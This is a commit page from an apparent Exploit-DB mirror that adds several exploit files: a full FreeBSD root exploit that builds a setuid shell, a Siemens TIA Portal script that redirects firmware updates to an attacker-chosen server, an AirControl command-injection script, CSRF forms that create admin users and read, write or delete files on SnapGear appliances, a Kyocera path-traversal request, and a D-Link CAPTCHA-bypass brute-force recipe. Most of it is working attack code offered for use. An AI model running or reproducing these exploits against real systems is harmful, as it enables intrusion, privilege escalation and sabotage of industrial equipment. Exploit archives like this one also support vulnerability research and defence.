bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Merge branch 'master' into fix

Browse source
This commit is contained in:
g0tmi1k 2020-06-22 22:14:47 +01:00 committed by GitHub
commit db8a253bfd
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
115 changed files with 13551 additions and 75 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

12
exploits/android/remote/47157.txt Normal file
View file

@ -0,0 +1,12 @@
# Exploit Title: Android 7-9 - Remote Code Execution
# Date: [date]
# Exploit Author: Marcin Kozlowski
# Version: 7-9
# Tested on: Android
# CVE : 2019-2107
CVE-2019-2107 - looks scary. Still remember Stagefright and PNG bugs vulns ....
With CVE-2019-2107 the decoder/codec runs under mediacodec user and with properly "crafted" video (with tiles enabled - ps_pps->i1_tiles_enabled_flag) you can possibly do RCE. The codec affected is HVEC (a.k.a H.265 and MPEG-H Part 2)
POC:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/47157.zip

678
exploits/freebsd/local/47081.sh Executable file
View file

@ -0,0 +1,678 @@
#!/bin/sh
# Exploit script for FreeBSD-SA-19:02.fd
#
# Author: Karsten König of Secfault Security
# Contact: karsten@secfault-security.com
# Twitter: @gr4yf0x
# Kudos: Maik, greg and Dirk for discussion and inspiration
#
# libmap.conf primitive inspired by kcope's 2005 exploit for Qpopper
echo "[+] Root Exploit for FreeBSD-SA-19:02.fd by Secfault Security"
umask 0000
if [ ! -f /etc/libmap.conf ]; then
echo "[!] libmap.conf has to exist"
exit
fi
cp /etc/libmap.conf ./
cat > heavy_cyber_weapon.c << EOF
#include <errno.h>
#include <fcntl.h>
#include <pthread.h>
#include <pthread_np.h>
#include <signal.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/cpuset.h>
#include <sys/event.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/sysctl.h>
#include <sys/types.h>
#include <sys/un.h>
#define N_FDS 0xfe
#define N_OPEN 0x2
#define N 1000000
#define NUM_THREADS 400
#define NUM_FORKS 3
#define FILE_SIZE 1024
#define CHUNK_SIZE 1
#define N_FILES 25
#define SERVER_PATH "/tmp/sync_forks"
#define DEFAULT_PATH "/tmp/pwn"
#define HAMMER_PATH "/tmp/pwn2"
#define ATTACK_PATH "/etc/libmap.conf"
#define HOOK_LIB "libutil.so.9"
#define ATTACK_LIB "/tmp/libno_ex.so.1.0"
#define CORE_0 0
#define CORE_1 1
#define MAX_TRIES 500
struct thread_data {
int fd;
int fd2;
};
pthread_mutex_t write_mtx, trigger_mtx, count_mtx, hammer_mtx;
pthread_cond_t write_cond, trigger_cond, count_cond, hammer_cond;
int send_recv(int fd, int sv[2], int n_fds) {
int ret, i;
struct iovec iov;
struct msghdr msg;
struct cmsghdr *cmh;
char cmsg[CMSG_SPACE(sizeof(int)*n_fds)];
int *fds; char buf[1];
iov.iov_base = "a";
iov.iov_len = 1;
msg.msg_name = NULL;
msg.msg_namelen = 0;
msg.msg_iov = &iov;
msg.msg_iovlen = 1;
msg.msg_control = cmsg;
msg.msg_controllen = CMSG_LEN(sizeof(int)*n_fds);
msg.msg_flags = 0;
cmh = CMSG_FIRSTHDR(&msg);
cmh->cmsg_len = CMSG_LEN(sizeof(int)*n_fds);
cmh->cmsg_level = SOL_SOCKET;
cmh->cmsg_type = SCM_RIGHTS;
fds = (int *)CMSG_DATA(cmsg);
for (i = 0; i < n_fds; i++) {
fds[i] = fd;
}
ret = sendmsg(sv[0], &msg, 0);
if (ret == -1) {
return 1;
}
iov.iov_base = buf;
msg.msg_name = NULL;
msg.msg_namelen = 0;
msg.msg_iov = &iov;
msg.msg_iovlen = 1;
msg.msg_control = cmh;
msg.msg_controllen = CMSG_SPACE(0);
msg.msg_flags = 0;
ret = recvmsg(sv[1], &msg, 0);
if (ret == -1) {
return 1;
}
return 0;
}
int open_tmp(char *path)
{
int fd;
char *real_path;
if (path != NULL) {
real_path = malloc(strlen(path) + 1);
strcpy(real_path, path);
}
else {
real_path = malloc(strlen(DEFAULT_PATH) + 1);
strcpy(real_path, DEFAULT_PATH);
}
if ((fd = open(real_path, O_RDWR | O_CREAT)) == -1) {
perror("[!] open");
exit(1);
}
fchmod(fd, 0700);
return fd;
}
void prepare_domain_socket(struct sockaddr_un *remote, char *path) {
bzero(remote, sizeof(struct sockaddr_un));
remote->sun_family = AF_UNIX;
strncpy(remote->sun_path, path, sizeof(remote->sun_path));
}
int bind_domain_socket(struct sockaddr_un *remote) {
int server_socket;
if ((server_socket = socket(AF_UNIX, SOCK_DGRAM, 0)) == -1) {
perror("[!] socket");
exit(1);
}
if (bind(server_socket,
(struct sockaddr *) remote,
sizeof(struct sockaddr_un)) != 0) {
perror("[!] bind");
exit(1);
}
return server_socket;
}
int connect_domain_socket_client() {
int client_socket;
if ((client_socket = socket(AF_UNIX, SOCK_DGRAM, 0)) == -1) {
perror("[!] socket");
exit(1);
}
return client_socket;
}
// Prevent panic at termination because f_count of the
// corrupted struct file is 0 at the moment this function
// is used but fd2 still points to the struct, hence fdrop()
// is called at exit and will panic because f_count will
// be below 0
//
// So we just use our known primitive to increase f_count
void prevent_panic(int sv[2], int fd)
{
send_recv(fd, sv, 0xfe);
}
int stick_thread_to_core(int core) {
/* int num_cores = sysconf(_SC_NPROCESSORS_ONLN); */
/* if (core_id < 0 || core_id >= num_cores) */
/* return EINVAL; */
cpuset_t cpuset;
CPU_ZERO(&cpuset);
CPU_SET(core, &cpuset);
pthread_t current_thread = pthread_self();
return pthread_setaffinity_np(current_thread, sizeof(cpuset_t), &cpuset);
}
void *trigger_uaf(void *thread_args) {
struct thread_data *thread_data;
int fd, fd2;
if (stick_thread_to_core(CORE_0) != 0) {
perror("[!] [!] trigger_uaf: Could not stick thread to core");
}
thread_data = (struct thread_data *)thread_args;
fd = thread_data->fd;
fd2 = thread_data->fd2;
printf("[+] trigger_uaf: fd: %d\n", fd);
printf("[+] trigger_uaf: fd2: %d\n", fd2);
printf("[+] trigger_uaf: Waiting for start signal from monitor\n");
pthread_mutex_lock(&trigger_mtx);
pthread_cond_wait(&trigger_cond, &trigger_mtx);
usleep(40);
// Close to fds to trigger uaf
//
// This assumes that fget_write() in kern_writev()
// was already successful!
//
// Otherwise kernel panic is triggered
//
// refcount = 2 (primitive+fget_write)
close(fd);
close(fd2);
// refcount = 0 => free
fd = open(ATTACK_PATH, O_RDONLY);
// refcount = 1
printf("[+] trigger_uaf: Opened read-only file, now hope\n");
printf("[+] trigger_uaf: Exit\n");
pthread_exit(NULL);
}
void *hammer(void *arg) {
int i, j, k, client_socket, ret;
char buf[FILE_SIZE], sync_buf[3];
FILE *fd[N_FILES];
struct sockaddr_un remote;
prepare_domain_socket(&remote, SERVER_PATH);
client_socket = connect_domain_socket_client();
strncpy(sync_buf, "1\n", 3);
for (i = 0; i < N_FILES; i++) {
unlink(HAMMER_PATH);
if ((fd[i] = fopen(HAMMER_PATH, "w+")) == NULL) {
perror("[!] fopen");
exit(1);
}
}
for (i = 0; i < FILE_SIZE; i++) {
buf[i] = 'a';
}
pthread_mutex_lock(&hammer_mtx);
// Sometimes sendto() fails because
// no free buffer is available
for (;;) {
if (sendto(client_socket,
sync_buf,
strlen(sync_buf), 0,
(struct sockaddr *) &remote,
sizeof(remote)) != -1) {
break;
}
}
pthread_cond_wait(&hammer_cond, &hammer_mtx);
pthread_mutex_unlock(&hammer_mtx);
for (i = 0; i < N; i++) {
for (k = 0; k < N_FILES; k++) {
rewind(fd[k]);
}
for (j = 0; j < FILE_SIZE*FILE_SIZE; j += CHUNK_SIZE) {
for (k = 0; k < N_FILES; k++) {
if (fwrite(&buf[j % FILE_SIZE], sizeof(char), CHUNK_SIZE, fd[k]) < 0) {
perror("[!] fwrite");
exit(1);
}
}
fflush(NULL);
}
}
pthread_exit(NULL);
}
// Works on UFS only
void *monitor_dirty_buffers(void *arg) {
int hidirtybuffers, numdirtybuffers;
size_t len;
len = sizeof(int);
if (sysctlbyname("vfs.hidirtybuffers", &hidirtybuffers, &len, NULL, 0) != 0) {
perror("[!] sysctlbyname hidirtybuffers");
exit(1);
};
printf("[+] monitor: vfs.hidirtybuffers: %d\n", hidirtybuffers);
while(1) {
sysctlbyname("vfs.numdirtybuffers", &numdirtybuffers, &len, NULL, 0);
if (numdirtybuffers >= hidirtybuffers) {
pthread_cond_signal(&write_cond);
pthread_cond_signal(&trigger_cond);
printf("[+] monitor: Reached hidirtybuffers watermark\n");
break;
}
}
pthread_exit(NULL);
}
int check_write(int fd) {
char buf[256];
int nbytes;
struct stat st;
printf("[+] check_write\n");
stat(DEFAULT_PATH, &st);
printf("[+] %s size: %ld\n", DEFAULT_PATH, st.st_size);
stat(ATTACK_PATH, &st);
printf("[+] %s size: %ld\n", ATTACK_PATH, st.st_size);
nbytes = read(fd, buf, strlen(HOOK_LIB));
printf("[+] Read bytes: %d\n", nbytes);
if (nbytes > 0 && strncmp(buf, HOOK_LIB, strlen(HOOK_LIB)) == 0) {
return 1;
}
else if (nbytes < 0) {
perror("[!] check_write:read");
printf("[!] check_write:Cannot check if it worked!");
return 1;
}
return 0;
}
void *write_to_file(void *thread_args) {
int fd, fd2, nbytes;
int *fd_ptr;
char buf[256];
struct thread_data *thread_data;
if (stick_thread_to_core(CORE_1) != 0) {
perror("[!] write_to_file: Could not stick thread to core");
}
fd_ptr = (int *) malloc(sizeof(int));
thread_data = (struct thread_data *)thread_args;
fd = thread_data->fd;
fd2 = open(ATTACK_PATH, O_RDONLY);
printf("[+] write_to_file: Wait for signal from monitor\n");
pthread_mutex_lock(&write_mtx);
pthread_cond_wait(&write_cond, &write_mtx);
snprintf(buf, 256, "%s %s\n#", HOOK_LIB, ATTACK_LIB);
nbytes = write(fd, buf, strlen(buf));
// Reopen directly after write to prevent panic later
//
// After the write f_count == 0 because after trigger_uaf()
// opened the read-only file, f_count == 1 and write()
// calls fdrop() at the end
//
// => f_count == 0
//
// A direct open hopefully assigns the now again free file
// object to fd so that we can prevent the panic with our
// increment primitive.
if ((fd = open_tmp(NULL)) == -1)
perror("[!] write_to_file: open_tmp");
*fd_ptr = fd;
if (nbytes < 0) {
perror("[!] [!] write_to_file:write");
} else if (nbytes > 0) {
printf("[+] write_to_file: We have written something...\n");
if (check_write(fd2) > 0)
printf("[+] write_to_file: It (probably) worked!\n");
else
printf("[!] write_to_file: It worked not :(\n");
}
printf("[+] write_to_file: Exit\n");
pthread_exit(fd_ptr);
}
void prepare(int sv[2], int fds[2]) {
int fd, fd2, i;
printf("[+] Start UaF preparation\n");
printf("[+] This can take a while\n");
// Get a single file descriptor to send via the socket
if ((fd = open_tmp(NULL)) == -1) {
perror("[!] open_tmp");
exit(1);
}
if ((fd2 = dup(fd)) == -1) {
perror("[!] dup");
exit(1);
}
// fp->f_count will increment by 0xfe in one iteration
// doing this 16909320 times will lead to
// f_count = 16909320 * 0xfe + 2 = 0xfffffff2
// Note the 2 because of the former call of dup() and
// the first open().
//
// To test our trigger we can send 0xd more fd's what
// would to an f_count of 0 when fdclose() is called in
// m_dispose_extcontrolm. fdrop() will reduce f_count to
// 0xffffffff = -1 and ultimately panic when _fdrop() is
// called because the latter asserts that f_count is 0.
// _fdrop is called in the first place because
// refcount_release() only checks that f_count is less or
// equal 1 to recognize the last reference.
//
// If we want to trigger the free without panic, we have
// to send 0xf fds and close an own what will lead to an
// fdrop() call without panic as f_count is 1 and reduced
// to 0 by close(). The unclosed descriptor references now
// a free 'struct file'.
for (i = 0; i < 16909320; i++) {
if (i % 1690930 == 0) {
printf("[+] Progress: %d%%\n", (u_int32_t) (i / 169093));
}
if (send_recv(fd, sv, N_FDS)) {
perror("[!] prepare:send_recv");
exit(1);
}
}
if (send_recv(fd, sv, 0xf)) {
perror("[!] prepare:send_recv");
exit(1);
}
fds[0] = fd;
fds[1] = fd2;
printf("[+] Finished UaF preparation\n");
}
void read_thread_status(int server_socket) {
int bytes_rec, count;
struct sockaddr_un client;
socklen_t len;
char buf[256];
struct timeval tv;
tv.tv_sec = 10;
tv.tv_usec = 0;
setsockopt(server_socket,
SOL_SOCKET, SO_RCVTIMEO,
(const char*)&tv, sizeof tv);
for (count = 0; count < NUM_FORKS*NUM_THREADS; count++) {
if (count % 100 == 0) {
printf("[+] Hammer threads ready: %d\n", count);
}
bzero(&client, sizeof(struct sockaddr_un));
bzero(buf, 256);
len = sizeof(struct sockaddr_un);
if ((bytes_rec = recvfrom(server_socket,
buf, 256, 0,
(struct sockaddr *) &client,
&len)) == -1) {
perror("[!] recvfrom");
break;
}
}
if (count != NUM_FORKS * NUM_THREADS) {
printf("[!] Could not create all hammer threads, will try though!\n");
}
}
void fire() {
int i, j, fd, fd2, bytes_rec, server_socket;
int sv[2], fds[2], hammer_socket[NUM_FORKS];
int *fd_ptr;
char socket_path[256], sync_buf[3], buf[256];
pthread_t write_thread, trigger_thread, monitor_thread;
pthread_t hammer_threads[NUM_THREADS];
pid_t pids[NUM_FORKS];
socklen_t len;
struct thread_data thread_data;
struct sockaddr_un server, client;
struct sockaddr_un hammer_socket_addr[NUM_FORKS];
// Socket for receiving thread status
unlink(SERVER_PATH);
prepare_domain_socket(&server, SERVER_PATH);
server_socket = bind_domain_socket(&server);
// Sockets to receive hammer signal
for (i = 0; i < NUM_FORKS; i++) {
snprintf(socket_path, sizeof(socket_path), "%s%c", SERVER_PATH, '1'+i);
unlink(socket_path);
prepare_domain_socket(&hammer_socket_addr[i], socket_path);
hammer_socket[i] = bind_domain_socket(&hammer_socket_addr[i]);
}
strncpy(sync_buf, "1\n", 3);
len = sizeof(struct sockaddr_un);
if (socketpair(PF_UNIX, SOCK_STREAM, 0, sv) == -1) {
perror("[!] socketpair");
exit(1);
}
pthread_mutex_init(&write_mtx, NULL);
pthread_mutex_init(&trigger_mtx, NULL);
pthread_cond_init(&write_cond, NULL);
pthread_cond_init(&trigger_cond, NULL);
pthread_create(&monitor_thread, NULL, monitor_dirty_buffers, NULL);
prepare(sv, fds);
fd = fds[0];
fd2 = fds[1];
thread_data.fd = fd;
thread_data.fd2 = fd2;
pthread_create(&trigger_thread, NULL, trigger_uaf, (void *) &thread_data);
pthread_create(&write_thread, NULL, write_to_file, (void *) &thread_data);
for (j = 0; j < NUM_FORKS; j++) {
if ((pids[j] = fork()) < 0) {
perror("[!] fork");
abort();
}
else if (pids[j] == 0) {
pthread_mutex_init(&hammer_mtx, NULL);
pthread_cond_init(&hammer_cond, NULL);
close(fd);
close(fd2);
/* Prevent that a file stream in the hammer threads
* gets the file descriptor of fd for debugging purposes
*/
if ((fd = open_tmp("/tmp/dummy")) == -1)
perror("[!] dummy");
if ((fd2 = open_tmp("/tmp/dummy2")) == -1)
perror("[!] dummy2");
printf("[+] Fork %d fd: %d\n", j, fd);
printf("[+] Fork %d fd2: %d\n", j, fd2);
for (i = 0; i < NUM_THREADS; i++) {
pthread_create(&hammer_threads[i], NULL, hammer, NULL);
}
printf("[+] Fork %d created all threads\n", j);
if ((bytes_rec = recvfrom(hammer_socket[j],
buf, 256, 0,
(struct sockaddr *) &client,
&len)) == -1) {
perror("[!] accept");
abort();
}
pthread_cond_broadcast(&hammer_cond);
for (i = 0; i < NUM_THREADS; i++) {
pthread_join(hammer_threads[i], NULL);
}
pthread_cond_destroy(&hammer_cond);
pthread_mutex_destroy(&hammer_mtx);
exit(0);
} else {
printf("[+] Created child with PID %d\n", pids[j]);
}
}
read_thread_status(server_socket);
printf("[+] Send signal to Start Hammering\n");
for (i = 0; i < NUM_FORKS; i++) {
if (sendto(hammer_socket[i],
sync_buf,
strlen(sync_buf), 0,
(struct sockaddr *) &hammer_socket_addr[i],
sizeof(hammer_socket_addr[0])) == -1) {
perror("[!] sendto");
exit(1);
}
}
pthread_join(monitor_thread, NULL);
for (i = 0; i < NUM_FORKS; i++) {
kill(pids[i], SIGKILL);
printf("[+] Killed %d\n", pids[i]);
}
pthread_join(write_thread, (void **) &fd_ptr);
pthread_join(trigger_thread, NULL);
pthread_mutex_destroy(&write_mtx);
pthread_mutex_destroy(&trigger_mtx);
pthread_cond_destroy(&write_cond);
pthread_cond_destroy(&trigger_cond);
printf("[+] Returned fd: %d\n", *fd_ptr);
prevent_panic(sv, *fd_ptr);
// fd was acquired from write_to_file
// which allocs a pointer for it
free(fd_ptr);
}
int main(int argc, char **argv)
{
setbuf(stdout, NULL);
fire();
return 0;
}
EOF
cc -o heavy_cyber_weapon -lpthread heavy_cyber_weapon.c
cat > program.c << EOF
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init()
{
if (!geteuid())
execl("/bin/sh","sh","-c","/bin/cp /bin/sh /tmp/xxxx ; /bin/chmod +xs /tmp/xxxx",NULL);
}
EOF
cc -o program.o -c program.c -fPIC
cc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles
cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
echo "[+] Firing the Heavy Cyber Weapon"
./heavy_cyber_weapon
su
if [ -f /tmp/xxxx ]; then
echo "[+] Enjoy!"
echo "[+] Do not forget to copy ./libmap.conf back to /etc/libmap.conf"
/tmp/xxxx
else
echo "[!] FAIL"
fi

51
exploits/hardware/remote/47083.py Executable file
View file

@ -0,0 +1,51 @@
##
# Exploit Title: Siemens TIA Portal unauthenticated remote command execution
# Date: 06/11/2019
# Exploit Author: Joseph Bingham
# CVE : CVE-2019-10915
# Vendor Homepage: www.siemens.com
# Software Link: https://new.siemens.com/global/en/products/automation/industry-software/automation-software/tia-portal.html
# Version: TIA Portal V15 Update 4
# Tested on: Windows 10
# Advisory: https://www.tenable.com/security/research/tra-2019-33
# Writeup: https://medium.com/tenable-techblog/nuclear-meltdown-with-critical-ics-vulnerabilities-8af3a1a13e6a
# Affected Vendors/Device/Firmware:
# - Siemens STEP7 / TIA Portal
##
##
# Example usage
# $ python cve_2019_10915_tia_portal_rce.py
# Received '0{"sid":"ZF_W8SDLY3SCGExV9QZc1Z9-","upgrades":[],"pingInterval":25000,"pingTimeout":60000}'
# Received '40'
# Received '42[" ",{"configType":{"key":"ProxyConfigType","defaultValue":0,"value":0},"proxyAddress":{"key":"ProxyAddress","defaultValue":"","value":""},"proxyPort":{"key":"ProxyPort","defaultValue":"","value":""},"userName":{"key":"ProxyUsername","defaultValue":"","value":""},"password":{"key":"ProxyPassword","defaultValue":"","value":""}},null]'
##
import websocket, ssl, argparse
parser = argparse.ArgumentParser()
parser.add_argument("target_host", help="TIA Portal host")
parser.add_argument("target_port", help="TIA Portal port (ie. 8888)", type=int)
parser.add_argument("(optional) update_server", help="Malicious firmware update server IP")
args = parser.parse_args()
host = args.target_host
port = args.target_port
updatesrv = args.update_server
ws = websocket.create_connection("wss://"+host+":"+port+"/socket.io/?EIO=3&transport=websocket&sid=", sslopt={"cert_reqs": ssl.CERT_NONE})
# Read current proxy settings
#req = '42["cli2serv",{"moduleFunc":"ProxyModule.readProxySettings","data":"","responseEvent":" "}]'
# Change application proxy settings
#req = '42["cli2serv",{"moduleFunc":"ProxyModule.saveProxyConfiguration","data":{"configType":{"key":"ProxyConfigType","defaultValue":0,"value":1},"proxyAddress":{"key":"ProxyAddress","defaultValue":"","value":"10.0.0.200"},"proxyPort":{"key":"ProxyPort","defaultValue":"","value":"8888"},"userName":{"key":"ProxyUsername","defaultValue":"","value":""},"password":{"key":"ProxyPassword","defaultValue":"","value":""}},responseEvent":" "}]'
# Force a malicious firmware update
req = 42["cli2serv",{"moduleFunc":"SoftwareModule.saveUrlSettings","data":{"ServerUrl":"https://"+updatesrv+"/FWUpdate/","ServerSource":"CORPORATESERVER","SelectedUSBDrive":"\\","USBDrivePath":"","downloadDestinationPath":"C:\\Siemens\\TIA Admin\\DownloadCache","isMoveDownloadNewDestination":true,"CyclicCheck":false,"sourcePath":"C:\\Siemens\\TIA Admin\\DownloadCache","productionLine":"ProductionLine1","isServerChanged":true},"responseEvent":" "}]'
ws.send(req)
result = ws.recv()
print("Received '%s'" % result)
result = ws.recv()
print("Received '%s'" % result)
result = ws.recv()
print("Received '%s'" % result)

30
exploits/hardware/webapps/48541.py Executable file
View file

@ -0,0 +1,30 @@
# Exploit Title: AirControl 1.4.2 - PreAuth Remote Code Execution
# Date: 2020-06-03
# Exploit Author: 0xd0ff9 vs j3ssie
# Vendor Homepage: https://www.ui.com/
# Software Link: https://www.ui.com/download/#!utilities
# Version: AirControl <= 1.4.2
# Signature: https://github.com/jaeles-project/jaeles-signatures/blob/master/cves/aircontrol-rce.yaml
import requests
import re
import urllib
import sys
print """USAGE: python exploit_aircontrol.py [url] [cmd]"""
url = sys.argv[1]
cmd = sys.argv[2]
burp0_url = url +"/.seam?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.io.BufferedReader').getDeclaredMethod('readLine').invoke(''.getClass().forName('java.io.BufferedReader').getConstructor(''.getClass().forName('java.io.Reader')).newInstance(''.getClass().forName('java.io.InputStreamReader').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Process').getDeclaredMethod('getInputStream').invoke(''.getClass().forName('java.lang.Runtime').getDeclaredMethod('exec',''.getClass()).invoke(''.getClass().forName('java.lang.Runtime').getDeclaredMethod('getRuntime').invoke(null),'"+cmd+"')))))}"
burp0_headers = {"User-Agent": "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Doflamingo) Chrome/80.0.3984.0 Safari/537.36", "Connection": "close"}
r = requests.get(burp0_url, headers=burp0_headers, verify=False, allow_redirects=False)
Locat = r.headers["Location"]
res = re.search("pwned=(.*)(&cid=.*)",Locat).group(1)
print "[Result CMD] ",cmd,": ",urllib.unquote_plus(res)

28
exploits/hardware/webapps/48551.txt Normal file
View file

@ -0,0 +1,28 @@
# Exploit Title: D-Link DIR-615 T1 20.10 - CAPTCHA Bypass
# Date: 2019-10-12
# Exploit Author: huzaifa hussain
# Vendor Homepage: https://in.dlink.com/
# Version: DIR-615 T1 ver:20.10
# Tested on: D-LINK ROUTER "MODEL NO: DIR-615" with "FIRMWARE VERSION:20.10" & "HARDWARE VERSION:T1
# CVE: CVE-2019-17525
D-LINK ROUTER "MODEL NO: DIR-615" with "FIRMWARE VERSION:20.10" & "HARDWARE VERSION:T1
A vulnerability found on login-in page of D-LINK ROUTER "DIR-615" with "FIRMWARE VERSION:20.10" & "HARDWARE VERSION:T1" which allows attackers to easily bypass CAPTCHA on login page by BRUTEFORCING.
------------------------------------
D-Link released new firmware designed to protect against logging in to the router using BRUTEFORCING. There is a flaw in the captcha authentication system that allows an attacker to reuse the same captcha without reloading new.
ATTACK SCENARIO AND REPRODUCTION STEPS
1: Find the ROUTER LoginPage.
2: Fill the required login credentials.
3: Fill the CAPTCH properly and Intercept the request in Burpsuit.
4: Send the Request to Intruder and select the target variables i.e. username & password which will we bruteforce under Positions Tab
5: Set the payloads on target variables i.e. username & password under Payloads Tab.
5: Set errors in (the validatecode is invalid & username or password error, try again) GREP-MATCH under Options Tab.
6: Now hit the start attack and you will find the correct credentials.
-------------------------------------
Huzaifa Hussain

72
exploits/hardware/webapps/48554.txt Normal file
View file

@ -0,0 +1,72 @@
# Title: SnapGear Management Console SG560 3.1.5 - Cross-Site Request Forgery (Add Super User)
# Author: LiquidWorm
# Date: 2020-06-04
# Vendor: http://www.securecomputing.com
# CVE: N/A
Secure Computing SnapGear Management Console SG560 v3.1.5 CSRF Add Super User
Vendor: Secure Computing Corp.
Product web page: http://www.securecomputing.com
Affected version: 3.1.5u1
Summary: The SG gateway appliance range provides Internet security and
privacy of communications for small and medium enterprises, and branch
offices. It simply and securely connects your office to the Internet,
and with its robust stateful firewall, shields your computers from
external threats.
Desc: The application interface allows users to perform certain actions
via HTTP requests without performing any validity checks to verify the
requests. This can be exploited to perform certain actions with administrative
privileges if a logged-in user visits a malicious web site.
Tested on: fnord/1.9
Apache 1.3.27 (Unix)
Linux 2.4.31
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2020-5567
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5567.php
14.05.2020
--
CSRF Add Super User:
--------------------
<html>
<body>
<form action="http://10.0.2.2/cgi-bin/cgix/adminusers" method="POST">
<input type="hidden" name=".form" value="edit" />
<input type="hidden" name=".page" value="adminusers_edit" />
<input type="hidden" name="login" value="testingus" />
<input type="hidden" name="fullname" value="ZSL" />
<input type="hidden" name="password" value="123456" />
<input type="hidden" name="confirm" value="123456" />
<input type="hidden" name="acl.login" value="on" />
<input type="hidden" name="acl.admin" value="on" />
<input type="hidden" name="acl.diags" value="on" />
<input type="hidden" name="acl.saverestore" value="on" />
<input type="hidden" name="acl.setpassword" value="on" />
<input type="hidden" name="finish" value="Finish" />
<input type="hidden" name=".defaultname" value="finish" />
<input type="submit" value="Idemo" />
</form>
</body>
</html>
Result /etc/shadow:
root:$1$YC$T/M8HLRXxKKPVEO7SU.02/:0:0:Super User:/:/bin/sh
sshd:!!:100:65534::/home:/bin/false
clamav:!!:103:65534::/home:/bin/false
testingus:$1$Xy$bxdLgsRlXHoMjEcMKqVq/.:104:104:ZSL:/home:/bin/sh

95
exploits/hardware/webapps/48556.txt Normal file
View file

@ -0,0 +1,95 @@
# Title: Secure Computing SnapGear Management Console SG560 3.1.5 - Arbitrary File Read
# Author:LiquidWorm
# Date: 2020-06-04
# Vendor: http://www.securecomputing.com
# CVE: N/A
Secure Computing SnapGear Management Console SG560 v3.1.5 Arbitrary File Read/Write
Vendor: Secure Computing Corp.
Product web page: http://www.securecomputing.com
Affected version: 3.1.5u1
Summary: The SG gateway appliance range provides Internet security and
privacy of communications for small and medium enterprises, and branch
offices. It simply and securely connects your office to the Internet,
and with its robust stateful firewall, shields your computers from
external threats.
Desc: The application allows the currently logged-in user to edit the
configuration files in the system using the CGI executable 'edit_config_files'
in /cgi-bin/cgix/. The files that are allowed to be modified (read/write/delete)
are located in the /etc/config/ directory. An attacker can manipulate
the POST request parameters to escape from the restricted environment
by using absolute path and start reading, writing and deleting arbitrary
files on the system.
Tested on: fnord/1.9
Apache 1.3.27 (Unix)
Linux 2.4.31
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2020-5568
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5568.php
14.05.2020
--
Read:
-----
<html>
<body>
<form action="http://10.0.2.2/cgi-bin/cgix/edit_config_files" method="POST">
<input type="hidden" name=".form" value="choices" />
<input type="hidden" name=".page" value="select_file" />
<input type="hidden" name="name$1337" value="/var/log/messages" />
<input type="hidden" name="modify$1337" value="1" />
<input type="hidden" name=".defaultname" value="newitem" />
<input type="submit" value="Read" />
</form>
</body>
</html>
Write/overwrite/move:
---------------------
<html>
<body>
<form action="http://10.0.2.2/cgi-bin/cgix/edit_config_files" method="POST">
<input type="hidden" name=".form" value="edit" />
<input type="hidden" name=".page" value="edit_file" />
<input type="hidden" name="enabled$0" value="" />
<input type="hidden" name="name$0" value="/etc/motd" />
<input type="hidden" name="mode$0" value="" />
<input type="hidden" name="filename" value="/etc/motd" />
<input type="hidden" name="filecontents" value="pwned" />
<input type="hidden" name="finish" value="Finish" />
<input type="hidden" name=".defaultname" value="finish" />
<input type="submit" value="Write" />
</form>
</body>
</html>
Delete:
-------
<html>
<body>
<form action="http://10.0.2.2/cgi-bin/cgix/edit_config_files" method="POST">
<input type="hidden" name=".form" value="choices" />
<input type="hidden" name=".page" value="select_file" />
<input type="hidden" name="name$251" value="/root/.secret" />
<input type="hidden" name="delete$251" value="1" />
<input type="hidden" name=".defaultname" value="newitem" />
<input type="submit" value="Delete" />
</form>
</body>
</html>

68
exploits/hardware/webapps/48561.txt Normal file
View file

@ -0,0 +1,68 @@
# Exploit Title : Kyocera Printer d-COPIA253MF - Directory Traversal (PoC)
# Exploit Author: Hakan Eren ŞAN
# Date: 2020-06-06
# Vendor Homepage: https://www.kyoceradocumentsolutions.com.tr/tr.html
# Version: d-COPIA253MF plus
# Tested on : Linux
# Credit: Berat Isler
# First step , you can capture the main page
# Then create a directory traveral payload like ../../../ this
# Then you add nullbyte to the end of the payload(%00)
# Last step sent your request
This is the code :
Request:
GET /wlmeng/../../../../../../../../../../../etc/passwd%00index.htm HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0)
Gecko/20100101 Firefox/76.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: rtl=0
Upgrade-Insecure-Requests: 1
If-None-Match: "/wlmeng/index.htm, Thu, 04 Jun 2020 13:41:16 GMT"
Cache-Control: max-age=0
Response:
HTTP/1.1 200 OK
Content-Length: 843
Date: Thu, 04 Jun 2020 16:09:54 GMT
Server: KM-MFP-http/V0.0.1
Last-Modified: Thu, 04 Jun 2020 13:41:16 GMT
ETag: "/wlmeng/../../../../../../../../../../../etc/passwd, Thu, 04 Jun
2020 13:41:16 GMT"
Content-Type: text/html
root::0:0:root:/root:/bin/sh
bin:*:1:1:bin:/bin:/bin/sh
daemon:*:2:2:daemon:/usr/sbin:/bin/sh
sys:*:3:3:sys:/dev:/bin/sh
adm:*:4:4:adm:/var/adm:/bin/sh
lp:*:5:7:lp:/var/spool/lpd:/bin/sh
sync:*:6:8:sync:/bin:/bin/sync
shutdown:*:7:9:shutdown:/sbin:/sbin/shutdown
halt:*:8:10:halt:/sbin:/sbin/halt
mail:*:9:11:mail:/var/mail:/bin/sh
